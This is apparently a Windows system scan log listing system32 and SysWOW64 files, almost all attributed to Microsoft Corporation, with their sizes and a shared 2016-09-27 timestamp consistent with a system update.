2016-09-27 13:02 - 2016-09-27 13:02 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2016-09-27 13:02 - 2016-09-27 13:02 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2016-09-27 13:02 - 2016-09-27 13:02 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02481768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02256224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02183792 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01891328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01847048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01555456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01453992 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01176664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01081856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01066328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pidgenx.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00790760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00781824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00755656 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00665768 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00650240 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00595488 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00509952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00450392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00409944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-09-27 13:02 - 2016-09-27 13:02 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00408600 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00303968 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NmaDirect.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Phoneutil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00204288 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS
2016-09-27 13:02 - 2016-09-27 13:02 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\XamlTileRender.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00151224 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00141824 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DscCoreConfProv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00133472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncPolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncPolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00062816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057400 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AddressParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00044472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00041824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
